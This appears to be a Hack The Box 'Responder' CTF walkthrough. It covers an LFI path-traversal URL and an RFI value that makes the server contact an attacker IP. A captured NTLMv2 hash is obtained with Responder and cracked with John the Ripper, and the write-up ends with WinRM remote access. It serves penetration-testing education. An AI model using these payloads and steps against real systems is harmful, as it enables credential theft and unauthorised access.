Responder writeup
Task 1
When visiting the web service using the IP address, what is the domain that we are being redirected to ?
Answer : unika.htb
Add this hostname to your /etc/hosts like this : HTB_MACHINE_IP unika.htb Task 2
Which scripting language is being used on the server to generate webpages?
Answer : php
PHP (Hypertext Preprocessor) is a widely-used, open-source scripting language designed for web development. It is embedded within HTML and is especially suited for creating dynamic and interactive websites.
PHP can interact with databases, handle forms, and generate content on the fly. It is server-side, meaning the code is executed on the server before the result is sent to the user's browser. PHP is known for its simplicity, flexibility, and extensive community support. Task 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
Answer : page
Task 4
Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "/desktop/../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer : /desktop/../../../windows/system32/drivers/etc/hosts
TLDR : LFI means you can access and potentially exploit local files on the server.
Test it yourself : http://unika.htb/index.php?page=/desktop/../../../windows/system32/drivers/etc/hosts
Task 5
Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "/desktop/../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer : //10.10.14.6/somefile
TLDR : RFI means you can include and potentially exploit files from a remote server. This can lead to unauthorized access, execution of malicious code, or other security issues.
The webserver could read/download/open/display a potentially malicious file from 10.10.14.6 (in this example)
Task 6
What does NTLM stand for?
Answer : New Technology Lan Manager
NTLM (NT LAN Manager) is a Microsoft authentication protocol used to authenticate users in a Windows network environment. It is a challenge-response mechanism that relies on hashing to verify credentials.
NTLM has known vulnerabilities and is considered less secure compared to newer protocols like Kerberos. It is often used for backward compatibility with older systems. Despite its flaws, NTLM is still prevalent in many legacy systems and networks. Task 7
Which flag do we use in the Responder utility to specify the network interface?
Responder was already installed on my Kali, otherwise get it here : Responder
After, you need to know which interface you will be using, here we are looking for the one corresponding to the tunnel you created with the openvpn to connect to HTB. If you are using a recent Kali you can see the IP address on the taskbar :
And it's usually the tun0 interface which you can check with ip a | grep tun0 
We find the same IP address, so should be the good interface.
Start Responder sudo responder -I tun0
It will wait and listen on this interface for a request.
Using the previously identified RFI, we make the server look for a file(even if it doesn't exist) on our side :
The webserver makes a request to access somefile on our host, Responder then replies to the request, pretending to be the requested resource. As part of the NTLM Authentication the webserver will send another request to authenticate to our machine, this request includes an NTLMv2 hash based of the user credentials :
Answer : -I
Responder is a network tool used to capture and manipulate authentication traffic in a network. It exploits weaknesses in protocols like LLMNR, NBT-NS, and MDNS (all of them used by NTLM) to capture credentials or relay attacks. Often used in penetration testing, Responder can trick devices into sending authentication data to the attacker�s machine. Task 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john , but the full name is what?.
Answer : John The Ripper
John the Ripper is a widely used open-source password cracking tool. It employs various attack methods like dictionary and brute-force attacks to crack hashed passwords. It supports numerous hash algorithms, including DES, MD5, and SHA.
Users can customize cracking strategies with various options and configuration files. It's often used for security testing and auditing Task 9
What is the password for the administrator user?
Answer : badminton
Here, I am using john with the rockyou wordlist and passing the NTLM hash we obtained previously. One of the cool features of john is that, if possible, it detects automatically the hash format, you can see here it knows that it's a NTLMv2 hash (line 3) Task 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Answer : 5985
It's a good task to give you another piece of advice: every time you start a new box, run an Nmap scan in the background while you do other things. Using the -vv switch provides immediate feedback when Nmap detects open ports.
For example, in this case, it first identified the web service on port 80 (which we used in earlier questions), allowing you to work on that while the scan continues." Task 11
Submit root flag
The 5985 is a known port of WinRM (Windows Remote Management) if you look it up on your favourite search engine you'll find there is a well-known tool called Evil-WinRM which allows to remotely execute commands and interact with a Windows system using the WinRM service.
Easy reverse shell !
Answer : Get your own !